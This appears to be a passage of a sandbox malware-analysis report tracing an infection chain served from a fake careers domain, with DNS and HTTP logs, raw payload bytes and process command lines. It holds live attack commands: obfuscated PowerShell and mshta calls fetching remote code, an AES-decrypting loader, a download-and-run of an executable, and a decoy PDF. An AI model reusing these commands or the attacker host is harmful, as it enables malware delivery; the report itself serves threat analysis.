                                                                                                                  Dec 23, 2024 07:08:23.661710978 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.661731958 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.661782026 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:23.661802053 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.661843061 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:23.663101912 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:23.667996883 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.668015957 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.668087959 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:23.668106079 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.668143034 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:23.671104908 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:23.673892975 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.673918009 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.673973083 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:23.673990011 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.674022913 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:23.675101042 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:23.680075884 CET44349725147.45.49.155192.168.2.8
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 23, 2024 07:07:52.910346031 CET | 62791 | 53 | 192.168.2.8 | 1.1.1.1
Dec 23, 2024 07:07:53.184915066 CET | 53 | 62791 | 1.1.1.1 | 192.168.2.8
Dec 23, 2024 07:08:18.154473066 CET | 63386 | 53 | 192.168.2.8 | 1.1.1.1
Dec 23, 2024 07:08:28.072923899 CET | 49293 | 53 | 192.168.2.8 | 1.1.1.1
Dec 23, 2024 07:08:28.290416956 CET | 53 | 49293 | 1.1.1.1 | 192.168.2.8
Dec 23, 2024 07:08:45.812508106 CET | 64832 | 53 | 192.168.2.8 | 1.1.1.1
Dec 23, 2024 07:08:46.042184114 CET | 53 | 64832 | 1.1.1.1 | 192.168.2.8
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 23, 2024 07:07:52.910346031 CET | 192.168.2.8 | 1.1.1.1 | 0x9ca2 | Standard query (0) | tiffany-careers.com | A (IP address) | IN (0x0001) | false
Dec 23, 2024 07:08:18.154473066 CET | 192.168.2.8 | 1.1.1.1 | 0x7c60 | Standard query (0) | x1.i.lencr.org | A (IP address) | IN (0x0001) | false
Dec 23, 2024 07:08:28.072923899 CET | 192.168.2.8 | 1.1.1.1 | 0xaf4c | Standard query (0) | nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs | A (IP address) | IN (0x0001) | false
Dec 23, 2024 07:08:45.812508106 CET | 192.168.2.8 | 1.1.1.1 | 0xeee0 | Standard query (0) | nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 23, 2024 07:07:53.184915066 CET | 1.1.1.1 | 192.168.2.8 | 0x9ca2 | No error (0) | tiffany-careers.com |  | 147.45.49.155 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 07:08:03.009874105 CET | 1.1.1.1 | 192.168.2.8 | 0xd665 | No error (0) | edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 23, 2024 07:08:03.009874105 CET | 1.1.1.1 | 192.168.2.8 | 0xd665 | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com |  | 217.20.58.99 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 07:08:03.009874105 CET | 1.1.1.1 | 192.168.2.8 | 0xd665 | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com |  | 217.20.58.98 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 07:08:03.009874105 CET | 1.1.1.1 | 192.168.2.8 | 0xd665 | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com |  | 217.20.58.100 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 07:08:03.009874105 CET | 1.1.1.1 | 192.168.2.8 | 0xd665 | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com |  | 217.20.58.101 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 07:08:18.291254997 CET | 1.1.1.1 | 192.168.2.8 | 0x7c60 | No error (0) | x1.i.lencr.org | crl.root-x1.letsencrypt.org.edgekey.net |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 23, 2024 07:08:28.290416956 CET | 1.1.1.1 | 192.168.2.8 | 0xaf4c | Name error (3) | nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs | none | none | A (IP address) | IN (0x0001) | false
Dec 23, 2024 07:08:46.042184114 CET | 1.1.1.1 | 192.168.2.8 | 0xeee0 | Name error (3) | nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs | none | none | A (IP address) | IN (0x0001) | false
Dec 23, 2024 07:09:14.785614014 CET | 1.1.1.1 | 192.168.2.8 | 0x44fc | No error (0) | edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 23, 2024 07:09:14.785614014 CET | 1.1.1.1 | 192.168.2.8 | 0x44fc | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com |  | 217.20.58.101 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 07:09:14.785614014 CET | 1.1.1.1 | 192.168.2.8 | 0x44fc | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com |  | 217.20.58.100 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 07:09:14.785614014 CET | 1.1.1.1 | 192.168.2.8 | 0x44fc | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com |  | 217.20.58.98 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 07:09:14.785614014 CET | 1.1.1.1 | 192.168.2.8 | 0x44fc | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com |  | 217.20.58.99 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 07:09:49.081552982 CET | 1.1.1.1 | 192.168.2.8 | 0xac49 | No error (0) | bg.microsoft.map.fastly.net |  | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 07:09:49.081552982 CET | 1.1.1.1 | 192.168.2.8 | 0xac49 | No error (0) | bg.microsoft.map.fastly.net |  | 199.232.214.172 | A (IP address) | IN (0x0001) | false
• tiffany-careers.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49704 | 147.45.49.155 | 443 | 4276 | C:\Windows\System32\mshta.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 06:07:54 UTC | 332 | OUT | GET /duychuan1 HTTP/1.1
Accept: */*
Accept-Language: en-CH
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: tiffany-careers.com
Connection: Keep-Alive
2024-12-23 06:07:55 UTC | 397 | IN | HTTP/1.1 200 OK
etag: "6ba97-67670d88-23c42;;;"
last-modified: Sat, 21 Dec 2024 18:48:40 GMT
content-length: 440983
accept-ranges: bytes
date: Mon, 23 Dec 2024 06:07:55 GMT
server: LiteSpeed
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
connection: close


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  1 | 192.168.2.8 | 49708 | 147.45.49.155 | 443 | 3800 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  2024-12-23 06:08:00 UTC | 88 | OUT | GET /Job_Description.pdf HTTP/1.1
                                                                                                                  Host: tiffany-careers.com
                                                                                                                  Connection: Keep-Alive
                                                                                                                  2024-12-23 06:08:00 UTC | 430 | IN | HTTP/1.1 200 OK
                                                                                                                  etag: "347816-67604c7c-2538f;;;"
                                                                                                                  last-modified: Mon, 16 Dec 2024 15:51:24 GMT
                                                                                                                  content-type: application/pdf
                                                                                                                  content-length: 3438614
                                                                                                                  accept-ranges: bytes
                                                                                                                  date: Mon, 23 Dec 2024 06:08:00 GMT
                                                                                                                  server: LiteSpeed
                                                                                                                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                  connection: close


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  2 | 192.168.2.8 | 49713 | 147.45.49.155 | 443 | 3800 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  2024-12-23 06:08:08 UTC | 55 | OUT | GET /BnQwAP.exe HTTP/1.1
                                                                                                                  Host: tiffany-careers.com
                                                                                                                  2024-12-23 06:08:09 UTC | 439 | IN | HTTP/1.1 200 OK
                                                                                                                  etag: "108a00-67670d1b-23c3f;;;"
                                                                                                                  last-modified: Sat, 21 Dec 2024 18:46:51 GMT
                                                                                                                  content-type: application/x-executable
                                                                                                                  content-length: 1083904
                                                                                                                  accept-ranges: bytes
                                                                                                                  date: Mon, 23 Dec 2024 06:08:08 GMT
                                                                                                                  server: LiteSpeed
                                                                                                                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                  connection: close
                                                                                                                  Data Ascii: jHEH_H/HAHEz/\/EHEHH/HKHE)l/EHEHH/HHEh/f.EHEHH/HHE)[/EHEHHEe/H/HZEHEH
                                                                                                                  2024-12-23 06:08:09 UTC16384INData Raw: 00 c7 05 89 12 0d 00 02 00 00 00 66 c7 05 84 12 0d 00 00 00 c7 05 9a 12 0d 00 02 00 00 00 c7 05 94 12 0d 00 02 00 00 00 66 c7 05 8f 12 0d 00 00 00 c7 05 a5 12 0d 00 02 00 00 00 c7 05 9f 12 0d 00 03 00 00 00 66 c7 05 9a 12 0d 00 00 00 c7 05 b0 12 0d 00 01 00 00 00 c7 05 aa 12 0d 00 01 00 00 00 66 c7 05 a5 12 0d 00 00 00 48 89 05 a6 12 0d 00 48 c7 45 f8 00 00 00 00 48 8d 05 73 6a 08 00 48 89 45 f0 48 8d 05 d4 a4 09 00 0f 10 45 f0 48 89 05 a9 12 0d 00 48 8d 05 72 6c 08 00 48 89 45 f0 48 8d 05 17 b0 09 00 48 89 05 b8 12 0d 00 48 8d 05 99 6e 08 00 48 c7 45 f8 00 00 00 00 0f 29 05 5a 12 0d 00 0f 10 45 f0 48 89 45 f0 48 8d 05 8b b1 09 00 48 89 05 b4 12 0d 00 48 8d 05 81 ab fe ff 48 c7 45 f8 00 00 00 00 0f 11 05 56 12 0d 00 c7 05 34 12 0d 00 02 00 00 00 0f 10 45
                                                                                                                  Data Ascii: ffffHHEHsjHEHEHHrlHEHHHnHE)ZEHEHHHHEV4E
                                                                                                                  2024-12-23 06:08:09 UTC16384INData Raw: 45 33 ff 48 8b 55 88 44 8b 4d a8 66 89 42 04 4c 8b 55 80 bb 52 00 00 00 4c 8b 85 a0 01 00 00 41 8b 88 88 00 00 00 8d 41 01 41 89 80 88 00 00 00 81 f9 fa 00 00 00 0f 8d dc 6b 04 00 b8 80 00 00 00 4d 8b d0 44 3b e8 0f 86 c5 54 04 00 49 8b 42 40 49 2b 42 20 48 d1 f8 48 89 45 18 48 89 55 c8 4c 8b b5 a8 01 00 00 41 8b cf 66 44 89 2a 45 8b c7 41 8b ba 98 00 00 00 49 8b c6 41 8b 5a 70 48 f7 d8 48 89 55 00 48 8d 45 10 48 1b d2 44 89 7d 10 48 23 d0 b8 87 00 00 00 48 89 54 24 70 44 3b e8 4c 89 54 24 68 41 8d 45 81 0f 94 c1 48 8d 55 00 41 3b c3 8b 85 98 01 00 00 41 0f 96 c0 03 c1 48 8b 8d 90 01 00 00 48 89 4c 24 60 48 8d 4d 38 48 89 4c 24 58 48 8d 4d 54 48 89 4c 24 50 48 8d 4d 50 48 89 4c 24 48 48 8d 8d 8c 00 00 00 48 89 4c 24 40 41 8b cc 89 44 24 38 89 74 24 30 48
                                                                                                                  Data Ascii: E3HUDMfBLURLAAAkMD;TIB@I+B HHEHULAfD*EAIAZpHHUHEHD}H#HT$pD;LT$hAEHUA;AHHL$`HM8HL$XHMTHL$PHMPHL$HHHL$@AD$8t$0H
                                                                                                                  2024-12-23 06:08:09 UTC16384INData Raw: 22 11 ff d0 48 83 c4 20 4c 8b 65 c0 4c 8b 6d c8 4c 8b 75 d0 4c 8b 7d d8 48 8b 5d e0 48 8b e5 5d c3 cc cc cc e9 8b 85 fe ff cc cc cc 40 53 48 83 ec 20 48 8b d9 eb 0f 48 8b cb e8 1d 46 00 00 85 c0 74 13 48 8b cb e8 5d 01 01 00 48 85 c0 74 e7 48 83 c4 20 5b c3 48 83 fb ff 74 06 e8 9f 09 00 00 cc e8 b9 09 00 00 cc e9 bf ff ff ff cc cc cc 48 83 ec 28 e8 57 0b 00 00 85 c0 74 21 65 48 8b 04 25 30 00 00 00 48 8b 48 08 eb 05 48 3b c8 74 14 33 c0 f0 48 0f b1 0d 9c a2 0c 00 75 ee 32 c0 48 83 c4 28 c3 b0 01 eb f7 cc cc cc 40 53 48 83 ec 20 0f b6 05 87 a2 0c 00 85 c9 bb 01 00 00 00 0f 44 c3 88 05 77 a2 0c 00 e8 86 09 00 00 e8 19 19 00 00 84 c0 75 04 32 c0 eb 14 e8 a4 5f 01 00 84 c0 75 09 33 c9 e8 35 19 00 00 eb ea 8a c3 48 83 c4 20 5b c3 cc cc cc 40 53 48 83 ec 40 80
                                                                                                                  Data Ascii: "H LeLmLuL}H]H]@SH HHFtH]HtH [HtH(Wt!eH%0HHH;t3Hu2H(@SH Dwu2_u35H [@SH@


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.8 | 49720 | 147.45.49.155 | 443 | 5544 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 06:08:16 UTC | 171 | OUT | GET /kfSlwlO HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: tiffany-careers.com
Connection: Keep-Alive
2024-12-23 06:08:17 UTC | 397 | IN | HTTP/1.1 200 OK
etag: "da2a8-67670bf7-23c3e;;;"
last-modified: Sat, 21 Dec 2024 18:41:59 GMT
content-length: 893608
accept-ranges: bytes
date: Mon, 23 Dec 2024 06:08:16 GMT
server: LiteSpeed
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.8 | 49725 | 147.45.49.155 | 443 | 3428 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 06:08:21 UTC | 80 | OUT | GET /jzuVDmQ.txt HTTP/1.1
Host: tiffany-careers.com
Connection: Keep-Alive
2024-12-23 06:08:22 UTC | 425 | IN | HTTP/1.1 200 OK
etag: "118e32-67670beb-23c3d;;;"
last-modified: Sat, 21 Dec 2024 18:41:47 GMT
content-type: text/plain
content-length: 1150514
accept-ranges: bytes
date: Mon, 23 Dec 2024 06:08:21 GMT
server: LiteSpeed
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
connection: close
                                                                                                                  Data Ascii: $BUTKNITTINGCHROME, $canberrafundamentalevilceo)$ConstraintGenderInterpretation = '4515492564720572772332944263678558870'$WillingWebpageFashion = 31$TinDeterminePerson = 78For $nESRrZA = 52 To 913If $WillingWebpageFashion = 30 ThenExp(5234)ACos(549



                                                                                                                  Target ID:0
                                                                                                                  Start time:01:07:47
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/duychuan1')"
                                                                                                                  Imagebase:0x7ff6160a0000
                                                                                                                  File size:576'000 bytes
                                                                                                                  MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:2
                                                                                                                  Start time:01:07:47
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6ee680000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:3
                                                                                                                  Start time:01:07:48
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/duychuan1')
                                                                                                                  Imagebase:0x7ff6cb6b0000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:4
                                                                                                                  Start time:01:07:48
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6ee680000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:5
                                                                                                                  Start time:01:07:50
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://tiffany-careers.com/duychuan1"
                                                                                                                  Imagebase:0x7ff6cb6b0000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:6
                                                                                                                  Start time:01:07:50
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Windows\System32\mshta.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\system32\mshta.exe" https://tiffany-careers.com/duychuan1
                                                                                                                  Imagebase:0x7ff692230000
                                                                                                                  File size:14'848 bytes
                                                                                                                  MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:moderate
                                                                                                                  Has exited:false

                                                                                                                  Target ID:8
                                                                                                                  Start time:01:07:54
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                  Imagebase:0x7ff6ee680000
                                                                                                                  File size:55'320 bytes
                                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:false

                                                                                                                  Target ID:9
                                                                                                                  Start time:01:07:55
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg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function tKQ ($VNRiPvLz){return -split ($VNRiPvLz -replace '..', '0x$& ')};$YYRv = tKQ($ddg.SubString(0, 2016));$Pks = [System.Security.Cryptography.Aes]::Create();$Pks.Key = tKQ($ddg.SubString(2016));$Pks.IV = New-Object byte[] 16;$udeEb = $Pks.CreateDecryptor();$fBRzq = [System.String]::new($udeEb.TransformFinalBlock($YYRv, 0,$YYRv.Length)); sal fd $fBRzq.Substring(3,3); fd $fBRzq.Substring(6)
                                                                                                                  Imagebase:0x7ff6cb6b0000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:10
                                                                                                                  Start time:01:07:55
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6ee680000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:false

                                                                                                                  Target ID:13
                                                                                                                  Start time:01:08:05
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\Job_Description.pdf"
                                                                                                                  Imagebase:0x7ff6e8200000
                                                                                                                  File size:5'641'176 bytes
                                                                                                                  MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:false

                                                                                                                  Target ID:14
                                                                                                                  Start time:01:08:07
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                                                                                  Imagebase:0x7ff79c940000
                                                                                                                  File size:3'581'912 bytes
                                                                                                                  MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:false

                                                                                                                  Target ID:15
                                                                                                                  Start time:01:08:07
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2068 --field-trial-handle=1616,i,16373349634998890577,12593525989554583629,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                                                                  Imagebase:0x7ff79c940000
                                                                                                                  File size:3'581'912 bytes
                                                                                                                  MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:false

                                                                                                                  Target ID:16
                                                                                                                  Start time:01:08:13
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Users\user\AppData\Roaming\BnQwAP.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Users\user\AppData\Roaming\BnQwAP.exe"
                                                                                                                  Imagebase:0x7ff655fe0000
                                                                                                                  File size:1'083'904 bytes
                                                                                                                  MD5 hash:9624FB616EDBE0DBAFD24F26424CA9E8
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 30%, ReversingLabs
                                                                                                                  Has exited:true

                                                                                                                  Target ID:17
                                                                                                                  Start time:01:08:13
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/kfSlwlO" -OutFile "C:\Users\Public\Guard.exe""
                                                                                                                  Imagebase:0x7ff6cb6b0000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:18
                                                                                                                  Start time:01:08:13
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6ee680000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:21
                                                                                                                  Start time:01:08:18
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"
                                                                                                                  Imagebase:0x7ff6cb6b0000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:22
                                                                                                                  Start time:01:08:18
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
